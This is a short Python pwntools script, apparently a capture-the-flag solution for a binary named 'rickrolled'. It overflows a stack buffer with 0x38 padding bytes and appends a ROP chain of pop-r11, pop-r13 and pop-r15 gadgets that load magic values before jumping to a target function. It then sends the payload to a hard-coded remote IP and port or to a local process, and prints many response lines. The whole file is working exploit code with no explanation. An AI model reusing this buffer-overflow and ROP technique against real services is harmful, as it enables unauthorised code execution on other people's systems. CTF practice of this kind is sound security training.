from pwn import *

#nc 43.205.113.100 8534
arg_val = 0xbeefdead
pop_r11 = 0x4011fa
pop_r13 = 0x401204
pop_r15 = 0x40120e

ret_gadjet = 0x40101a
rickroll_addr = 0x401214
payload = b"\0" * 0x38 + p64(pop_r11) + p64(0xbeefdead) + p64(pop_r13) + p64(0xabadbeef) + p64(pop_r15) + p64(0xdeadbead) + p64(ret_gadjet) + p64(rickroll_addr)

def remo_pwn():
    p = remote("43.205.113.100", 8534)
    print(p.recvuntil("to me?"))
    p.sendline(payload)
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())

def local_pwn():
    p = process("./rickrolled")
    print(p.recvuntil("to me?"))
    p.sendline(payload)
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())
    print(p.recvline())

remo_pwn()